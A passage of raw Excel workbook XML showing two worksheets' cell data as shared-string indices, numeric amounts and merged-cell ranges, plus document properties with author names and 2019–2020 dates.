        <v>472</v>
      </c>
      <c r="C9" s="20" t="s">
        <v>473</v>
      </c>
      <c r="D9" s="20" t="s">
        <v>474</v>
      </c>
    </row>
    <row r="10" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A10" s="19" t="s">
        <v>465</v>
      </c>
      <c r="B10" s="17" t="s">
        <v>475</v>
      </c>
      <c r="C10" s="20" t="s">
        <v>476</v>
      </c>
      <c r="D10" s="20" t="s">
        <v>477</v>
      </c>
    </row>
    <row r="11" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A11" s="19" t="s">
        <v>478</v>
      </c>
      <c r="B11" s="17" t="s">
        <v>479</v>
      </c>
      <c r="C11" s="20" t="s">
        <v>480</v>
      </c>
      <c r="D11" s="20" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="12" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A12" s="19" t="s">
        <v>482</v>
      </c>
      <c r="B12" s="17" t="s">
        <v>483</v>
      </c>
      <c r="C12" s="20" t="s">
        <v>484</v>
      </c>
      <c r="D12" s="25" t="s">
        <v>485</v>
      </c>
    </row>
    <row r="13" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A13" s="30"/>
      <c r="B13" s="31"/>
      <c r="C13" s="31"/>
      <c r="D13" s="32"/>
    </row>
    <row r="14" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A14" s="15" t="s">
        <v>8</v>
      </c>
      <c r="B14" s="14"/>
      <c r="C14" s="14"/>
      <c r="D14" s="29"/>
    </row>
    <row r="15" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A15" s="19" t="s">
        <v>458</v>
      </c>
      <c r="B15" s="17" t="s">
        <v>45</v>
      </c>
      <c r="C15" s="21" t="s">
        <v>486</v>
      </c>
      <c r="D15" s="20" t="s">
        <v>487</v>
      </c>
    </row>
    <row r="16" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A16" s="19" t="s">
        <v>462</v>
      </c>
      <c r="B16" s="17" t="s">
        <v>488</v>
      </c>
      <c r="C16" s="21" t="s">
        <v>489</v>
      </c>
      <c r="D16" s="20"/>
    </row>
    <row r="17" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A17" s="19" t="s">
        <v>465</v>
      </c>
      <c r="B17" s="17" t="s">
        <v>490</v>
      </c>
      <c r="C17" s="21" t="s">
        <v>491</v>
      </c>
      <c r="D17" s="20"/>
    </row>
    <row r="18" spans="1:4" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A18" s="19" t="s">
        <v>478</v>
      </c>
      <c r="B18" s="17" t="s">
        <v>38</v>
      </c>
      <c r="C18" s="20" t="s">
        <v>492</v>
      </c>
      <c r="D18" s="20"/>
    </row>
    <row r="19" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A19" s="19" t="s">
        <v>482</v>
      </c>
      <c r="B19" s="17" t="s">
        <v>493</v>
      </c>
      <c r="C19" s="21" t="s">
        <v>494</v>
      </c>
      <c r="D19" s="20"/>
    </row>
    <row r="20" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A20" s="22"/>
      <c r="B20" s="16"/>
      <c r="C20" s="34"/>
      <c r="D20" s="35"/>
    </row>
    <row r="21" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A21" s="15" t="s">
        <v>6</v>
      </c>
      <c r="B21" s="14"/>
      <c r="C21" s="14"/>
      <c r="D21" s="29"/>
    </row>
    <row r="22" spans="1:4" ht="43.2" x14ac:dyDescent="0.3">
      <c r="A22" s="19" t="s">
        <v>458</v>
      </c>
      <c r="B22" s="17" t="s">
        <v>495</v>
      </c>
      <c r="C22" s="20" t="s">
        <v>496</v>
      </c>
      <c r="D22" s="20" t="s">
        <v>497</v>
      </c>
    </row>
    <row r="23" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A23" s="19" t="s">
        <v>462</v>
      </c>
      <c r="B23" s="17" t="s">
        <v>498</v>
      </c>
      <c r="C23" s="20" t="s">
        <v>499</v>
      </c>
      <c r="D23" s="20" t="s">
        <v>500</v>
      </c>
    </row>
    <row r="24" spans="1:4" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A24" s="19" t="s">
        <v>465</v>
      </c>
      <c r="B24" s="17" t="s">
        <v>501</v>
      </c>
      <c r="C24" s="20" t="s">
        <v>502</v>
      </c>
      <c r="D24" s="20" t="s">
        <v>503</v>
      </c>
    </row>
    <row r="25" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A25" s="19" t="s">
        <v>478</v>
      </c>
      <c r="B25" s="17" t="s">
        <v>504</v>
      </c>
      <c r="C25" s="21" t="s">
        <v>505</v>
      </c>
      <c r="D25" s="20" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="26" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A26" s="19" t="s">
        <v>482</v>
      </c>
      <c r="B26" s="17" t="s">
        <v>506</v>
      </c>
      <c r="C26" s="21" t="s">
        <v>507</v>
      </c>
      <c r="D26" s="20" t="s">
        <v>508</v>
      </c>
    </row>
    <row r="27" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A27" s="19" t="s">
        <v>509</v>
      </c>
      <c r="B27" s="17" t="s">
        <v>510</v>
      </c>
      <c r="C27" s="21" t="s">
        <v>511</v>
      </c>
      <c r="D27" s="20" t="s">
        <v>512</v>
      </c>
    </row>
    <row r="28" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A28" s="30"/>
      <c r="B28" s="31"/>
      <c r="C28" s="31"/>
      <c r="D28" s="32"/>
    </row>
    <row r="29" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A29" s="15" t="s">
        <v>513</v>
      </c>
      <c r="B29" s="14"/>
      <c r="C29" s="14"/>
      <c r="D29" s="29"/>
    </row>
    <row r="30" spans="1:4" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A30" s="19" t="s">
        <v>458</v>
      </c>
      <c r="B30" s="17" t="s">
        <v>171</v>
      </c>
      <c r="C30" s="20" t="s">
        <v>514</v>
      </c>
      <c r="D30" s="20"/>
    </row>
    <row r="31" spans="1:4" x14ac:dyDescent="0.3">
      <c r="A31" s="19" t="s">
        <v>462</v>
      </c>
      <c r="B31" s="17" t="s">
        <v>515</v>
      </c>
      <c r="C31" s="20" t="s">
        <v>516</v>
      </c>
      <c r="D31" s="20"/>
    </row>
    <row r="32" spans="1:4" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A32" s="19" t="s">
        <v>465</v>
      </c>
      <c r="B32" s="17" t="s">
        <v>517</v>
      </c>
      <c r="C32" s="20" t="s">
        <v>518</v>
      </c>
      <c r="D32" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="A21:D21"/>
    <mergeCell ref="A28:D28"/>
    <mergeCell ref="A29:D29"/>
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="A6:D6"/>
    <mergeCell ref="A7:D7"/>
    <mergeCell ref="A13:D13"/>
    <mergeCell ref="A14:D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CB6C-1681-41AF-8C84-D913C7FE8295}">
  <dimension ref="A1:F24"/>
  <sheetViews>
    <sheetView showGridLines="0" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="2" max="2" width="21.77734375" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="22.21875" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="10.21875" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="95.77734375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A1" s="18" t="s">
        <v>5</v>
      </c>
      <c r="B1" s="18" t="s">
        <v>519</v>
      </c>
      <c r="C1" s="18" t="s">
        <v>62</v>
      </c>
      <c r="D1" s="18" t="s">
        <v>520</v>
      </c>
      <c r="E1" s="18" t="s">
        <v>521</v>
      </c>
      <c r="F1" s="18" t="s">
        <v>522</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A2" s="15" t="s">
        <v>457</v>
      </c>
      <c r="B2" s="14"/>
      <c r="C2" s="14"/>
      <c r="D2" s="14"/>
      <c r="E2" s="14"/>
      <c r="F2" s="29"/>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A3" s="24">
        <v>1</v>
      </c>
      <c r="B3" s="24" t="s">
        <v>523</v>
      </c>
      <c r="C3" s="26" t="s">
        <v>468</v>
      </c>
      <c r="D3" s="26">
        <v>7000</v>
      </c>
      <c r="E3" s="26" t="s">
        <v>524</v>
      </c>
      <c r="F3" s="26" t="s">
        <v>525</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A4" s="15" t="s">
        <v>7</v>
      </c>
      <c r="B4" s="14"/>
      <c r="C4" s="14"/>
      <c r="D4" s="14"/>
      <c r="E4" s="14"/>
      <c r="F4" s="29"/>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A5" s="36">
        <v>2</v>
      </c>
      <c r="B5" s="36" t="s">
        <v>469</v>
      </c>
      <c r="C5" s="27" t="s">
        <v>526</v>
      </c>
      <c r="D5" s="28">
        <v>3077.73</v>
      </c>
      <c r="E5" s="27" t="s">
        <v>524</v>
      </c>
      <c r="F5" s="27" t="s">
        <v>527</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A6" s="37"/>
      <c r="B6" s="37"/>
      <c r="C6" s="17" t="s">
        <v>528</v>
      </c>
      <c r="D6" s="23">
        <v>4346.6899999999996</v>
      </c>
      <c r="E6" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F6" s="17" t="s">
        <v>529</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A7" s="37">
        <v>3</v>
      </c>
      <c r="B7" s="37" t="s">
        <v>472</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>341</v>
      </c>
      <c r="D7" s="17">
        <v>8910</v>
      </c>
      <c r="E7" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F7" s="17" t="s">
        <v>530</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A8" s="37"/>
      <c r="B8" s="37"/>
      <c r="C8" s="17" t="s">
        <v>531</v>
      </c>
      <c r="D8" s="17">
        <v>338</v>
      </c>
      <c r="E8" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F8" s="17" t="s">
        <v>532</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A9" s="37">
        <v>4</v>
      </c>
      <c r="B9" s="37" t="s">
        <v>475</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>533</v>
      </c>
      <c r="D9" s="17">
        <v>22680</v>
      </c>
      <c r="E9" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F9" s="17" t="s">
        <v>534</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A10" s="37"/>
      <c r="B10" s="37"/>
      <c r="C10" s="17" t="s">
        <v>535</v>
      </c>
      <c r="D10" s="17">
        <v>4886</v>
      </c>
      <c r="E10" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F10" s="17" t="s">
        <v>536</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A11" s="37"/>
      <c r="B11" s="37"/>
      <c r="C11" s="17" t="s">
        <v>537</v>
      </c>
      <c r="D11" s="17">
        <v>1091</v>
      </c>
      <c r="E11" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F11" s="17" t="s">
        <v>538</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A12" s="38">
        <v>5</v>
      </c>
      <c r="B12" s="38" t="s">
        <v>479</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>539</v>
      </c>
      <c r="D12" s="17">
        <v>14000</v>
      </c>
      <c r="E12" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F12" s="17" t="s">
        <v>541</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A13" s="36"/>
      <c r="B13" s="36"/>
      <c r="C13" s="17" t="s">
        <v>542</v>
      </c>
      <c r="D13" s="17">
        <v>6000</v>
      </c>
      <c r="E13" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F13" s="17" t="s">
        <v>543</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A14" s="38">
        <v>6</v>
      </c>
      <c r="B14" s="38" t="s">
        <v>483</v>
      </c>
      <c r="C14" s="17" t="s">
        <v>544</v>
      </c>
      <c r="D14" s="17">
        <v>37800</v>
      </c>
      <c r="E14" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F14" s="17" t="s">
        <v>545</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A15" s="36"/>
      <c r="B15" s="36"/>
      <c r="C15" s="17" t="s">
        <v>546</v>
      </c>
      <c r="D15" s="17">
        <v>1144.8</v>
      </c>
      <c r="E15" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F15" s="17" t="s">
        <v>547</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A16" s="15" t="s">
        <v>8</v>
      </c>
      <c r="B16" s="14"/>
      <c r="C16" s="14"/>
      <c r="D16" s="14"/>
      <c r="E16" s="14"/>
      <c r="F16" s="29"/>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A17" s="19">
        <v>7</v>
      </c>
      <c r="B17" s="19" t="s">
        <v>498</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>500</v>
      </c>
      <c r="D17" s="17">
        <v>249</v>
      </c>
      <c r="E17" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F17" s="17" t="s">
        <v>548</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A18" s="37">
        <v>8</v>
      </c>
      <c r="B18" s="37" t="s">
        <v>501</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>549</v>
      </c>
      <c r="D18" s="17">
        <v>12168</v>
      </c>
      <c r="E18" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F18" s="17" t="s">
        <v>550</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A19" s="37"/>
      <c r="B19" s="37"/>
      <c r="C19" s="17" t="s">
        <v>551</v>
      </c>
      <c r="D19" s="17">
        <v>435</v>
      </c>
      <c r="E19" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F19" s="17" t="s">
        <v>552</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A20" s="19">
        <v>9</v>
      </c>
      <c r="B20" s="19" t="s">
        <v>504</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>193</v>
      </c>
      <c r="D20" s="17">
        <v>4040</v>
      </c>
      <c r="E20" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F20" s="17" t="s">
        <v>553</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A21" s="19">
        <v>10</v>
      </c>
      <c r="B21" s="19" t="s">
        <v>554</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>508</v>
      </c>
      <c r="D21" s="17">
        <v>950</v>
      </c>
      <c r="E21" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F21" s="17" t="s">
        <v>555</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A22" s="15" t="s">
        <v>6</v>
      </c>
      <c r="B22" s="14"/>
      <c r="C22" s="14"/>
      <c r="D22" s="14"/>
      <c r="E22" s="14"/>
      <c r="F22" s="29"/>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A23" s="19">
        <v>11</v>
      </c>
      <c r="B23" s="19" t="s">
        <v>556</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>557</v>
      </c>
      <c r="D23" s="17">
        <v>1399</v>
      </c>
      <c r="E23" s="17" t="s">
        <v>524</v>
      </c>
      <c r="F23" s="17" t="s">
        <v>558</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.3">
      <c r="A24" s="19">
        <v>12</v>
      </c>
      <c r="B24" s="19" t="s">
        <v>559</v>
      </c>
      <c r="C24" s="39" t="s">
        <v>560</v>
      </c>
      <c r="D24" s="17">
        <v>499</v>
      </c>
      <c r="E24" s="17" t="s">
        <v>540</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>561</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="16">
    <mergeCell ref="A16:F16"/>
    <mergeCell ref="A18:A19"/>
    <mergeCell ref="B18:B19"/>
    <mergeCell ref="A22:F22"/>
    <mergeCell ref="A9:A11"/>
    <mergeCell ref="B9:B11"/>
    <mergeCell ref="A12:A13"/>
    <mergeCell ref="B12:B13"/>
    <mergeCell ref="A14:A15"/>
    <mergeCell ref="B14:B15"/>
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="A4:F4"/>
    <mergeCell ref="A5:A6"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="A7:A8"/>
    <mergeCell ref="B7:B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Checklist1</vt:lpstr>
      <vt:lpstr>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Varkey John</dc:creator>
  <cp:lastModifiedBy>Sagar Jangam</cp:lastModifiedBy>
  <cp:lastPrinted>2019-12-31T10:32:53Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-05-21T11:16:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-17T06:56:49Z</dcterms:modified>
</cp:coreProperties>
</file>